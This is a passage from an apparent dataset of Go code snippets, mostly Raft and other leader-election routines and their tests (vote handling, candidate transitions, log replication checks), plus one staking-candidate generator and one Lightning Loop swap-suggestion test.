true\n\n\t\t//fmt.Println(\"before calling prepRV\")\n\t\treqVoteObj := r.prepRequestVote() //prepare request vote obj\n\t\t//fmt.Println(\"after calling prepRV\")\n\t\tr.sendToAll(reqVoteObj) //send requests for vote to all servers\n\t\t//this loop for reading responses from all servers\n\t\tfor {\n\t\t\treq := r.receive()\n\t\t\tswitch req.(type) {\n\t\t\tcase RequestVoteResponse: //got the vote response\n\t\t\t\tresponse := req.(RequestVoteResponse) //explicit typecasting so that fields of struct can be used\n\t\t\t\t//fmt.Println(\"Got the vote\", response.voteGranted)\n\t\t\t\tif response.voteGranted {\n\t\t\t\t\t//\t\t\t\t\ttemp := r.f_specific[response.id] //NOT ABLE TO DO THIS--WHY??--WORK THIS WAY\n\t\t\t\t\t//\t\t\t\t\ttemp.vote = true\n\n\t\t\t\t\tr.f_specific[response.id].vote = true\n\t\t\t\t\t//r.voteCount = r.voteCount + 1\n\t\t\t\t}\n\t\t\t\tvoteCount := r.countVotes()\n\t\t\t\t//fmt.Println(\"I am:\", r.Myconfig.Id, \"Votecount is\", voteCount)\n\t\t\t\tif voteCount >= majority {\n\t\t\t\t\t//fmt.Println(\"Votecount is majority, I am new leader\", r.Myconfig.Id)\n\t\t\t\t\tElectionTimer.Stop()\n\t\t\t\t\tr.LeaderConfig.Id = r.Myconfig.Id //update leader details\n\t\t\t\t\treturn leader //become the leader\n\t\t\t\t}\n\n\t\t\tcase AppendEntriesReq: //received an AE request instead of votes, i.e. some other leader has been elected\n\t\t\t\trequest := req.(AppendEntriesReq)\n\t\t\t\t//Can be clubbed with serviceAppendEntriesReq with few additions!--SEE LATER\n\n\t\t\t\t//fmt.Println(\"I am \", r.Myconfig.Id, \"candidate,got AE_Req from\", request.leaderId, \"terms my,leader are\", r.currentTerm, request.term)\n\t\t\t\twaitTime_secs := secs * time.Duration(waitTime)\n\t\t\t\tappEntriesResponse := AppendEntriesResponse{}\n\t\t\t\tappEntriesResponse.followerId = r.Myconfig.Id\n\t\t\t\tappEntriesResponse.success = false //false by default, in case of heartbeat or invalid leader\n\t\t\t\tif request.term >= r.currentTerm { //valid leader\n\t\t\t\t\tr.LeaderConfig.Id = request.leaderId //update leader info\n\t\t\t\t\tElectionTimer.Reset(waitTime_secs) //reset the timer\n\t\t\t\t\tvar myLastIndexTerm int\n\t\t\t\t\tif len(r.myLog) == 0 {\n\t\t\t\t\t\tmyLastIndexTerm = -1\n\n\t\t\t\t\t} else {\n\t\t\t\t\t\tmyLastIndexTerm = r.myLog[r.myMetaData.lastLogIndex].Term\n\t\t\t\t\t}\n\t\t\t\t\tif request.leaderLastLogIndex == r.myMetaData.lastLogIndex && request.term == myLastIndexTerm { //this is heartbeat from a valid leader\n\t\t\t\t\t\tappEntriesResponse.success = true\n\t\t\t\t\t}\n\t\t\t\t\tsend(request.leaderId, appEntriesResponse)\n\t\t\t\t\treturn follower\n\t\t\t\t} else {\n\t\t\t\t\t//check if log is same\n\t\t\t\t\t//fmt.Println(\"In candidate, AE_Req-else\")\n\t\t\t\t\tsend(request.leaderId, appEntriesResponse)\n\t\t\t\t}\n\t\t\tcase int:\n\t\t\t\twaitTime_secs := secs * time.Duration(waitTime)\n\t\t\t\tElectionTimer.Reset(waitTime_secs)\n\t\t\t\tbreak //come out of inner loop i.e. restart the election process\n\t\t\t\t//default: if something else comes, then ideally it should ignore that and again wait for correct type of response on channel\n\t\t\t\t//it does this, in the present code structure\n\t\t\t}\n\t\t}\n\t}\n}", "func leaderElection(nodeCtx *NodeCtx) {\n\t// The paper doesnt specifically mention any leader election protocols, so we assume that the leader election protocol\n\t// used in bootstrap is also used in the normal protocol, with the adition of iteration (unless the same leader would\n\t// be selected).\n\n\t// TODO actually add a setup phase where one must publish their hash. This way there will always\n\t// be a leader even if some nodes are offline. But with the assumption that every node is online\n\t// this works fine.\n\n\t// get current randomness\n\trecBlock := nodeCtx.blockchain.getLastReconfigurationBlock()\n\trnd := recBlock.Randomness\n\n\t// get current iteration\n\t_currIteration := nodeCtx.i.getI()\n\tcurrI := make([]byte, 8)\n\tbinary.LittleEndian.PutUint64(currI, uint64(_currIteration))\n\n\tlistOfHashes := make([]byte32sortHelper, len(nodeCtx.committee.Members))\n\t// calculate hash(id | rnd | currI) for every member\n\tii := 0\n\tfor _, m := range nodeCtx.committee.Members {\n\t\tconnoctated := byteSliceAppend(m.Pub.Bytes[:], rnd[:], currI)\n\t\thsh := hash(connoctated)\n\t\tlistOfHashes[ii] = byte32sortHelper{m.Pub.Bytes, hsh}\n\t\tii++\n\t}\n\n\t// sort list\n\tlistOfHashes = sortListOfByte32SortHelper(listOfHashes)\n\n\t// calculate hash of self\n\tselfHash := hash(byteSliceAppend(nodeCtx.self.Priv.Pub.Bytes[:], rnd[:], currI))\n\t// fmt.Println(\"self: \", bytes32ToString(selfHash), bytes32ToString(nodeCtx.self.Priv.Pub.Bytes))\n\t// for i, lof := range listOfHashes {\n\t// \tfmt.Println(i, bytes32ToString(lof.toSort), bytes32ToString(lof.original))\n\t// }\n\n\t// the leader is the lowest in list except if selfHash is lower than that.\n\t// fmt.Println(byte32Operations(selfHash, \"<\", listOfHashes[0].toSort))\n\tif byte32Operations(selfHash, \"<\", listOfHashes[0].toSort) {\n\t\tnodeCtx.committee.CurrentLeader = nodeCtx.self.Priv.Pub\n\t\tlog.Println(\"I am leader!\", nodeCtx.amILeader())\n\t} else {\n\t\tleader := listOfHashes[0].original\n\t\tnodeCtx.committee.CurrentLeader = nodeCtx.committee.Members[leader].Pub\n\t}\n}", "func (r *Node) doCandidate() stateFunction {\n\tr.Out(\"Transitioning to CandidateState\")\n\tr.State = CandidateState\n\n\t// Foollowing &5.2\n\t// Increment currentTerm\n\tr.setCurrentTerm(r.GetCurrentTerm() + 1)\n\t// Vote for self\n\tr.setVotedFor(r.Self.GetId())\n\t// Reset election timer\n\ttimeout := randomTimeout(r.config.ElectionTimeout)\n\telectionResults := make(chan bool)\n\tfallbackChan := make(chan bool)\n\tgo r.requestVotes(electionResults, fallbackChan, r.GetCurrentTerm())\n\tfor {\n\t\tselect {\n\t\tcase shutdown := <-r.gracefulExit:\n\t\t\tif shutdown {\n\t\t\t\treturn nil\n\t\t\t}\n\n\t\tcase clientMsg := <-r.clientRequest:\n\t\t\tclientMsg.reply <- rpc.ClientReply{\n\t\t\t\tStatus: rpc.ClientStatus_ELECTION_IN_PROGRESS,\n\t\t\t\tResponse: nil,\n\t\t\t\tLeaderHint: r.Self,\n\t\t\t}\n\n\t\tcase registerMsg := <-r.registerClient:\n\t\t\tregisterMsg.reply <- rpc.RegisterClientReply{\n\t\t\t\tStatus: rpc.ClientStatus_ELECTION_IN_PROGRESS,\n\t\t\t\tClientId: 0,\n\t\t\t\tLeaderHint: r.Self,\n\t\t\t}\n\n\t\tcase voteMsg := <-r.requestVote:\n\t\t\tif r.handleCompetingRequestVote(voteMsg) {\n\t\t\t\treturn r.doFollower\n\t\t\t}\n\n\t\tcase appendMsg := <-r.appendEntries:\n\t\t\t_, toFollower := r.handleAppendEntries(appendMsg)\n\t\t\tif toFollower {\n\t\t\t\treturn r.doFollower\n\t\t\t}\n\n\t\tcase elected := <-electionResults:\n\t\t\tif elected {\n\t\t\t\treturn r.doLeader\n\t\t\t}\n\n\t\tcase toFollower := <-fallbackChan:\n\t\t\tif toFollower {\n\t\t\t\treturn r.doFollower\n\t\t\t}\n\n\t\tcase <-timeout:\n\t\t\treturn r.doCandidate\n\t\t}\n\t}\n}", "func (le *LeaderElector) initElection() {\n\thighestRank := false\n\t//Poll servers with higher rank\n\tfor SID, serv := range le.ThisServer.GroupInfoPtr.GroupMembers {\n\t\tif SID < le.ThisServer.SID {\n\t\t\t//Has Higher rank, SID 0 > SID 1 > SID 2 ....\n\t\t\tok := call(serv, \"LeaderElector.ChangeLeader\", new(interface{}), &highestRank)\n\t\t\tif ok && highestRank == true {\n\t\t\t\t//Theres a server with higher rank, let go\n\t\t\t\tdebug(\"[*] Info : LeaderElector : There is Another Server - %s- With Higher Rank.Backing off. \", serv)\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}\n\t//No server with higher rank, become leader\n\tle.becomeLeader()\n}", "func testNonleaderElectionTimeoutRandomized(t *testing.T, state StateType) {\n\tet := 10\n\tr := newTestRaft(1, []uint64{1, 2, 3}, et, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(r)\n\ttimeouts := make(map[int]bool)\n\tfor round := 0; round < 50*et; round++ {\n\t\tswitch state {\n\t\tcase StateFollower:\n\t\t\tr.becomeFollower(r.Term+1, 2)\n\t\tcase StateCandidate:\n\t\t\tr.becomeCandidate()\n\t\t}\n\n\t\ttime := 0\n\t\tfor len(r.readMessages()) == 0 {\n\t\t\tr.tick()\n\t\t\ttime++\n\t\t}\n\t\ttimeouts[time] = true\n\t}\n\n\tfor d := et + 1; d < 2*et; d++ {\n\t\tif !timeouts[d] {\n\t\t\tt.Errorf(\"timeout in %d ticks should happen\", d)\n\t\t}\n\t}\n}", "func TestLeaderCommitEntry(t *testing.T) {\n\ts := NewMemoryStorage()\n\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, s)\n\tdefer closeAndFreeRaft(r)\n\tr.becomeCandidate()\n\tr.becomeLeader()\n\tcommitNoopEntry(r, s)\n\tli := r.raftLog.lastIndex()\n\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\n\tfor _, m := range r.readMessages() {\n\t\tr.Step(acceptAndReply(m))\n\t}\n\n\tif g := r.raftLog.committed; g != li+1 {\n\t\tt.Errorf(\"committed = %d, want %d\", g, li+1)\n\t}\n\twents := []pb.Entry{{Index: li + 1, Term: 1, Data: []byte(\"some data\")}}\n\tif g := r.raftLog.nextEnts(); !reflect.DeepEqual(g, wents) {\n\t\tt.Errorf(\"nextEnts = %+v, want %+v\", g, wents)\n\t}\n\tmsgs := r.readMessages()\n\tsort.Sort(messageSlice(msgs))\n\tfor i, m := range msgs {\n\t\tif w := uint64(i + 2); m.To != w {\n\t\t\tt.Errorf(\"to = %x, want %x\", m.To, w)\n\t\t}\n\t\tif m.Type != pb.MsgApp {\n\t\t\tt.Errorf(\"type = %v, want %v\", m.Type, pb.MsgApp)\n\t\t}\n\t\tif m.Commit != li+1 {\n\t\t\tt.Errorf(\"commit = %d, want %d\", m.Commit, li+1)\n\t\t}\n\t}\n}", "func (rf *Raft) convertToCandidate() {\n rf.mu.Lock()\n DLCPrintf(\"Server (%d)[state=%s, term=%d, votedFor=%d] convert to Candidate\", rf.me, rf.state, rf.currentTerm, rf.votedFor) \n rf.state = \"Candidate\"\n rf.currentTerm++\n rf.votedFor = rf.me\n rf.electionTime = generateElectionTime()\n rf.electionTimer.Reset(time.Duration(rf.electionTime) * time.Millisecond)\n rf.persist()\n DLCPrintf(\"Server (%d)[state=%s, term=%d, votedFor=%d, electionTime=%d] start request votes\", rf.me, rf.state, rf.currentTerm, rf.votedFor, rf.electionTime) \n rf.mu.Unlock()\n\n // 启动一个线程, requestVote\n go rf.requestForVotes()\n\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\tDPrintf(\"Raft node (%d) handles with RequestVote, candidateId: %v\\n\", rf.me, args.CandidateId)\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\treply.Term = rf.currentTerm\n\treply.PeerId = rf.me\n\n\tif rf.currentTerm == args.Term && rf.votedFor != -1 && rf.votedFor != args.CandidateId {\n\t\tDPrintf(\"Raft node (%v) denied vote, votedFor: %v, candidateId: %v.\\n\", rf.me,\n\t\t\trf.votedFor, args.CandidateId)\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\n\tlastLogIndex := len(rf.logs) - 1\n\tlastLogEntry := rf.logs[lastLogIndex]\n\tif lastLogEntry.Term > args.LastLogTerm || lastLogIndex > args.LastLogIndex {\n\t\t// If this node is more up-to-date than candidate, then reject vote\n\t\t//DPrintf(\"Raft node (%v) LastLogIndex: %v, LastLogTerm: %v, args (%v, %v)\\n\", rf.me,\n\t\t//\tlastLogIndex, lastLogEntry.Term, args.LastLogIndex, args.LastLogTerm)\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\n\trf.tryEnterFollowState(args.Term)\n\n\trf.currentTerm = args.Term\n\trf.votedFor = args.CandidateId\n\treply.VoteGranted = true\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tcurrentTerm := rf.currentTerm\n\n\t//If RPC request or response contains term T > currentTerm:\n\t//set currentTerm = T, convert to follower\n\tif (args.Term > currentTerm) {\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = NILVOTE\n\n\t\tif rf.role == LEADER {\n\t\t\tDPrintf(\"LeaderCondition sorry server %d term %d not a leader, logs %v, commitIndex %d\\n\",rf.me, rf.currentTerm, rf.log, rf.commitIndex) \n\t\t} \n\t\trf.role = FOLLOWER\n\t\trf.persist()\n\t}\n\n\tif args.Term < currentTerm {\n\t\t// Reply false if term < currentTerm \n\t\treply.VoteGranted = false\n\t\treply.Term = currentTerm \n\t}else {\n\t\t//If votedFor is null or candidateId,\n\t\t//and candidate’s log is at least as up-to-date as receiver’s log,\n\t\t//&& rf.atLeastUptodate(args.LastLogIndex, args.LastLogTerm)\n\t\tif (rf.votedFor == NILVOTE || rf.votedFor == args.CandidateId) && rf.atLeastUptodate(args.LastLogIndex, args.LastLogTerm) {\n\t\t\ti , t := rf.lastLogIdxAndTerm()\n\t\t\tPrefixDPrintf(rf, \"voted to candidate %d, args %v, lastlogIndex %d, lastlogTerm %d\\n\", args.CandidateId, args, i, t)\n\t\t\trf.votedFor = args.CandidateId\n\t\t\trf.persist()\t\n\t\t\treply.VoteGranted = true\n\t\t\treply.Term = rf.currentTerm\n\t\t\t//you grant a vote to another peer.\n\t\t\trf.resetTimeoutEvent = makeTimestamp()\n\t\t}else {\n\t\t\treply.VoteGranted = false\n\t\t\treply.Term = rf.currentTerm\n\t\t}\t\n\t}\n}", "func (r *Raft) CallElection(){\n\t\n\tr.CurrentTerm+=1 // increase the current term by 1 to avoid conflict\n\tVoteAckcount:=1 // Number of vote received, initialised to 1 as own vote fo candiate is positive\n\tr.IsLeader = 0 // Set the state of server as candiate\n\tvar VoteCount =make (chan int,(len(r.ClusterConfigV.Servers)-1))\n\t//fmt.Println(\"Sending vote requests for:\",r.Id)\n\t\n\tfor _,server := range r.ClusterConfigV.Servers {\t\t\t\n\t\t\t\tif server.Id != r.Id{\n\t\t\t\t\tgo r.sendVoteRequestRpc(server,VoteCount) \t\t\t\t\t\n\t\t\t\t}}\n\n\tfor i:=0;i< len(r.ClusterConfigV.Servers)-1;i++ {\n\t\t\t\t\tVoteAckcount = VoteAckcount+ <- VoteCount \n\t\t\t\t\t// if Candiate gets majoirty, declare candiate as Leader and send immediae heartbeat to followers declaring\n\t\t\t\t\t// election of new leader\n\t\t\t\tif VoteAckcount > (len(r.ClusterConfigV.Servers)/2) && r.IsLeader == 0 { \n\t\t\t\t\tlog.Println(\"New leader is:\",r.Id)\n\t\t\t\t\tr.IsLeader=1\n\t\t\t\t\tr.LeaderId=r.Id\n\t\t\t\t\traft.SendImmediateHeartBit <- 1\n\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\t\t\n\t\tif r.IsLeader==1{\n\t\t\t// initlised next index to lastlog index, and match index to 0 fro all servers\n\t\tfor _,server := range r.ClusterConfigV.Servers {\n\t\t\t\tr.NextIndex[server.Id]=len(r.Log)\n\t\t\t\tr.MatchIndex[server.Id]=0\n\t\t\t\tr.ResetTimer()\n\t\t\t}\n\t\t}else{ \n\t\t\t// Is candidate fails to get elected, fall back to follower state and reset timer for reelection \n\t\t\tr.IsLeader=2\n\t\t\tr.ResetTimer()\n\t\t}\n}", "func randomCandidate(r *rand.Rand) Candidate {\n\tvar status CandidateStatus\n\tif r.Float64() < float64(0.5) {\n\t\tstatus = Bonded\n\t} else {\n\t\tstatus = Unbonded\n\t}\n\tassets := sdk.NewRat(int64(r.Int31n(10000)))\n\tliabilities := sdk.NewRat(int64(r.Int31n(10000)))\n\treturn Candidate{\n\t\tStatus: status,\n\t\tAddress: addrs[0],\n\t\tPubKey: pks[0],\n\t\tAssets: assets,\n\t\tLiabilities: liabilities,\n\t}\n}", "func TestProposal(t *testing.T) {\n\ttests := []struct {\n\t\t*network\n\t\tsuccess bool\n\t}{\n\t\t{newNetwork(nil, nil, nil), true},\n\t\t{newNetwork(nil, nil, nopStepper), true},\n\t\t{newNetwork(nil, nopStepper, nopStepper), false},\n\t\t{newNetwork(nil, nopStepper, nopStepper, nil), false},\n\t\t{newNetwork(nil, nopStepper, nopStepper, nil, nil), true},\n\t}\n\n\tfor j, tt := range tests {\n\t\tsend := func(m pb.Message) {\n\t\t\tdefer func() {\n\t\t\t\t// only recover is we expect it to panic so\n\t\t\t\t// panics we don't expect go up.\n\t\t\t\tif !tt.success {\n\t\t\t\t\te := recover()\n\t\t\t\t\tif e != nil {\n\t\t\t\t\t\tt.Logf(\"#%d: err: %s\", j, e)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}()\n\t\t\ttt.send(m)\n\t\t}\n\n\t\tdefer tt.closeAll()\n\t\tdata := []byte(\"somedata\")\n\n\t\t// promote 0 the leader\n\t\tsend(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\t\tsend(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: data}}})\n\n\t\twantLog := newLog(NewMemoryStorage(), raftLogger)\n\t\tif tt.success {\n\t\t\twantLog = &raftLog{\n\t\t\t\tstorage: newInitedMemoryStorage(\n\t\t\t\t\t[]pb.Entry{{}, {Data: nil, Term: 1, Index: 1}, {Term: 1, Index: 2, Data: data}},\n\t\t\t\t),\n\t\t\t\tunstable: unstable{offset: 3},\n\t\t\t\tcommitted: 2}\n\t\t}\n\t\tdefer wantLog.storage.(IExtRaftStorage).Close()\n\t\tbase := ltoa(wantLog)\n\t\tfor i, p := range tt.peers {\n\t\t\tif sm, ok := p.(*raft); ok {\n\t\t\t\tl := ltoa(sm.raftLog)\n\t\t\t\tif g := diffu(base, l); g != \"\" {\n\t\t\t\t\tt.Errorf(\"#%d: diff:\\n%s\", i, g)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tt.Logf(\"#%d: empty log\", i)\n\t\t\t}\n\t\t}\n\t\tsm := tt.network.peers[1].(*raft)\n\t\tif g := sm.Term; g != 1 {\n\t\t\tt.Errorf(\"#%d: term = %d, want %d\", j, g, 1)\n\t\t}\n\t}\n}", "func (rf *Raft) enterCandidateState() {\n\trf.mu.Lock()\n\trf.currentState = StateCandidate\n\trf.currentTerm += 1\n\trf.votedFor = rf.me\n\trf.numberOfGrantedVotes = int32(1)\n\trf.mu.Unlock()\n\tDPrintf(\"Raft node (%v) reverted into candidate, currentTerm: %v.\\n\", rf.me, rf.currentTerm)\n\n\t// First, start a goroutine to handle RequestVote reply\n\tgo rf.handleRequestVoteReply()\n\n\tfor ii :=range rf.peers {\n\t\tif ii == rf.me {\n\t\t\tcontinue\n\t\t}\n\n\t\tgo func(i int) {\n\t\t\t// Initialize RequestVoteArgs\n\t\t\targs := RequestVoteArgs{}\n\t\t\targs.Term = rf.currentTerm\n\t\t\targs.CandidateId = rf.me\n\t\t\targs.LastLogIndex = len(rf.logs) - 1\n\t\t\targs.LastLogTerm = rf.logs[args.LastLogIndex].Term\n\n\t\t\treply := RequestVoteReply{}\n\n\t\t\trf.sendRequestVote(i, &args, &reply)\n\t\t\t// Handle RequestVoteRPC reply\n\t\t\trf.requestVoteReplyHandler <- reply\n\t\t}(ii)\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n DPrintf(\"%d: %d recieve RequestVote from %d:%d\\n\", rf.currentTerm, rf.me, args.Term, args.Candidate)\n // Your code here (2A, 2B).\n rf.mu.Lock()\n defer rf.mu.Unlock()\n if args.Term < rf.currentTerm {\n \n reply.VoteGranted = false\n reply.Term = rf.currentTerm\n DPrintf(\"%d: %d recieve voteRequest from %d:%d %v\\n\", rf.currentTerm, rf.me, args.Term, args.Candidate, reply.VoteGranted)\n return\n }\n\n if args.Term > rf.currentTerm {\n rf.votedFor = -1\n rf.currentTerm = args.Term\n }\n\n if rf.votedFor == -1 || rf.votedFor == args.Candidate {\n // election restriction\n if args.LastLogTerm < rf.log[len(rf.log) - 1].Term ||\n (args.LastLogTerm == rf.log[len(rf.log) - 1].Term &&\n args.LastLogIndex < len(rf.log) - 1) {\n rf.votedFor = -1\n reply.VoteGranted = false\n DPrintf(\"%d: %d recieve voteRequest from %d:%d %v\\n\", rf.currentTerm, rf.me, args.Term, args.Candidate, reply.VoteGranted)\n return\n }\n\n \n if rf.state == FOLLOWER {\n rf.heartbeat <- true\n }\n rf.state = FOLLOWER\n rf.resetTimeout()\n rf.votedFor = args.Candidate\n\n \n reply.VoteGranted = true\n reply.Term = args.Term\n DPrintf(\"%d: %d recieve voteRequest from %d:%d %v\\n\", rf.currentTerm, rf.me, args.Term, args.Candidate, reply.VoteGranted)\n return\n }\n reply.VoteGranted = false\n reply.Term = args.Term\n DPrintf(\"%d: %d recieve voteRequest from %d:%d %v\\n\", rf.currentTerm, rf.me, args.Term, args.Candidate, reply.VoteGranted)\n}", "func TestRGITBasic_TestDeleteRaftLogWhenNewTermElection(t *testing.T) {\n\n\ttestInitAllDataFolder(\"TestRGIT_TestDeleteRaftLogWhenNewTermElection\")\n\traftGroupNodes := testCreateThreeNodes(t, 20*1024*1024)\n\tdefer func() {\n\t\ttestDestroyRaftGroups(raftGroupNodes)\n\t}()\n\tproposeMessages := testCreateMessages(t, 10)\n\ttestDoProposeDataAndWait(t, raftGroupNodes, proposeMessages)\n\n\t// get leader information\n\tleaderNode := testGetLeaderNode(t, raftGroupNodes)\n\tlastIndex, err := leaderNode.storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tlastTerm, err := leaderNode.storage.Term(lastIndex)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"first propose, last index:%d, last term: %d\\n\", lastIndex, lastTerm)\n\tfmt.Printf(\"first propose, last index:%d, last term: %d\\n\", lastIndex, lastTerm)\n\n\t// stop 2 raft node\n\traftGroupNodes[0].Stop()\n\traftGroupNodes[1].Stop()\n\n\t// insert wrong message(which will be replace by new leader) into the last node\n\twrongMessages := testCreateMessages(t, 20)\n\twrongEntries := make([]raftpb.Entry, 0)\n\n\tfor i, msg := range wrongMessages {\n\t\tb := make([]byte, 8+len(msg))\n\t\tbinary.BigEndian.PutUint64(b, uint64(i+1))\n\t\tcopy(b[8:], []byte(msg))\n\n\t\tentry := raftpb.Entry{\n\t\t\tTerm: lastTerm,\n\t\t\tIndex: lastIndex + uint64(i+1),\n\t\t\tType: raftpb.EntryNormal,\n\t\t\tData: b,\n\t\t}\n\t\twrongEntries = append(wrongEntries, entry)\n\n\t}\n\traftGroupNodes[2].storage.StoreEntries(wrongEntries)\n\tfmt.Printf(\"save wrong message success, begin index: %d, term: %d\\n\", wrongEntries[0].Index, wrongEntries[0].Term)\n\twrongIndex, err := raftGroupNodes[2].storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"save wrong message to node[2], last index :%d\", wrongIndex)\n\n\traftGroupNodes[2].Stop()\n\n\t// restart\n\traftGroupNodes[0].Start()\n\traftGroupNodes[1].Start()\n\n\t// wait a new leader\n\ttime.Sleep(5 * time.Second)\n\tleaderNode = testGetLeaderNode(t, raftGroupNodes)\n\tleaderLastIndex, err := leaderNode.storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tleaderLastTerm, err := leaderNode.storage.Term(leaderLastIndex)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"after restart, leader last term: %d, last index: %d\\n\", leaderLastTerm, leaderLastIndex)\n\tfmt.Printf(\"after restart, leader last term: %d, last index: %d\\n\", leaderLastTerm, leaderLastIndex)\n\n\t// start the last one node\n\traftGroupNodes[2].Start()\n\t// wait leader append entries\n\ttime.Sleep(5 * time.Second)\n\n\t// check the raft log of last node will be replicated by new leader\n\tlastIndex, err = raftGroupNodes[2].storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tlastTerm, err = raftGroupNodes[2].storage.Term(lastIndex)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"the node with wrong message after restart, last term: %d, last index:%d \\n\", lastTerm, lastIndex)\n\tfmt.Printf(\"the node with wrong message after restart, last term: %d, last index:%d \\n\", lastTerm, lastIndex)\n\n\tif lastIndex != leaderLastIndex {\n\t\tt.Fatalf(\"the node[2] after restart doesn't match the new leader, the wrong node index:%d, but the leader:%d\", lastIndex, leaderLastIndex)\n\t}\n\n\tif lastTerm != leaderLastTerm {\n\t\tt.Fatalf(\"the node[2] after restart doesn't match the new leader, the wrong node term :%d, but the leader:%d\", lastTerm, leaderLastTerm)\n\t}\n\n}", "func TestRestrictedSuggestions(t *testing.T) {\n\tvar (\n\t\tfailedWithinTimeout = &loopdb.LoopEvent{\n\t\t\tSwapStateData: loopdb.SwapStateData{\n\t\t\t\tState: loopdb.StateFailOffchainPayments,\n\t\t\t},\n\t\t\tTime: testTime,\n\t\t}\n\n\t\tfailedBeforeBackoff = &loopdb.LoopEvent{\n\t\t\tSwapStateData: loopdb.SwapStateData{\n\t\t\t\tState: loopdb.StateFailOffchainPayments,\n\t\t\t},\n\t\t\tTime: testTime.Add(\n\t\t\t\tdefaultFailureBackoff * -1,\n\t\t\t),\n\t\t}\n\n\t\t// failedTemporary is a swap that failed outside of our backoff\n\t\t// period, but we still want to back off because the swap is\n\t\t// considered pending.\n\t\tfailedTemporary = &loopdb.LoopEvent{\n\t\t\tSwapStateData: loopdb.SwapStateData{\n\t\t\t\tState: loopdb.StateFailTemporary,\n\t\t\t},\n\t\t\tTime: testTime.Add(\n\t\t\t\tdefaultFailureBackoff * -3,\n\t\t\t),\n\t\t}\n\n\t\tchanRules = map[lnwire.ShortChannelID]*SwapRule{\n\t\t\tchanID1: chanRule,\n\t\t\tchanID2: chanRule,\n\t\t}\n\t)\n\n\ttests := []struct {\n\t\tname string\n\t\tchannels []lndclient.ChannelInfo\n\t\tloopOut []*loopdb.LoopOut\n\t\tloopIn []*loopdb.LoopIn\n\t\tchanRules map[lnwire.ShortChannelID]*SwapRule\n\t\tpeerRules map[route.Vertex]*SwapRule\n\t\texpected *Suggestions\n\t}{\n\t\t{\n\t\t\tname: \"no existing swaps\",\n\t\t\tchannels: []lndclient.ChannelInfo{\n\t\t\t\tchannel1,\n\t\t\t},\n\t\t\tloopOut: nil,\n\t\t\tloopIn: nil,\n\t\t\tchanRules: chanRules,\n\t\t\texpected: &Suggestions{\n\t\t\t\tOutSwaps: []loop.OutRequest{\n\t\t\t\t\tchan1Rec,\n\t\t\t\t},\n\t\t\t\tDisqualifiedChans: noneDisqualified,\n\t\t\t\tDisqualifiedPeers: noPeersDisqualified,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"unrestricted loop out\",\n\t\t\tchannels: []lndclient.ChannelInfo{\n\t\t\t\tchannel1,\n\t\t\t},\n\t\t\tloopOut: []*loopdb.LoopOut{\n\t\t\t\t{\n\t\t\t\t\tContract: &loopdb.LoopOutContract{\n\t\t\t\t\t\tOutgoingChanSet: nil,\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t\tchanRules: chanRules,\n\t\t\texpected: &Suggestions{\n\t\t\t\tOutSwaps: []loop.OutRequest{\n\t\t\t\t\tchan1Rec,\n\t\t\t\t},\n\t\t\t\tDisqualifiedChans: noneDisqualified,\n\t\t\t\tDisqualifiedPeers: noPeersDisqualified,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"unrestricted loop in\",\n\t\t\tchannels: []lndclient.ChannelInfo{\n\t\t\t\tchannel1,\n\t\t\t},\n\t\t\tloopIn: []*loopdb.LoopIn{\n\t\t\t\t{\n\t\t\t\t\tContract: &loopdb.LoopInContract{\n\t\t\t\t\t\tLastHop: nil,\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t\tchanRules: chanRules,\n\t\t\texpected: &Suggestions{\n\t\t\t\tOutSwaps: []loop.OutRequest{\n\t\t\t\t\tchan1Rec,\n\t\t\t\t},\n\t\t\t\tDisqualifiedChans: noneDisqualified,\n\t\t\t\tDisqualifiedPeers: noPeersDisqualified,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"restricted loop out\",\n\t\t\tchannels: []lndclient.ChannelInfo{\n\t\t\t\tchannel1, channel2,\n\t\t\t},\n\t\t\tloopOut: []*loopdb.LoopOut{\n\t\t\t\t{\n\t\t\t\t\tContract: chan1Out,\n\t\t\t\t},\n\t\t\t},\n\t\t\tchanRules: chanRules,\n\t\t\texpected: &Suggestions{\n\t\t\t\tOutSwaps: []loop.OutRequest{\n\t\t\t\t\tchan2Rec,\n\t\t\t\t},\n\t\t\t\tDisqualifiedChans: map[lnwire.ShortChannelID]Reason{\n\t\t\t\t\tchanID1: ReasonLoopOut,\n\t\t\t\t},\n\t\t\t\tDisqualifiedPeers: noPeersDisqualified,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"restricted loop in\",\n\t\t\tchannels: []lndclient.ChannelInfo{\n\t\t\t\tchannel1, channel2,\n\t\t\t},\n\t\t\tloopIn: 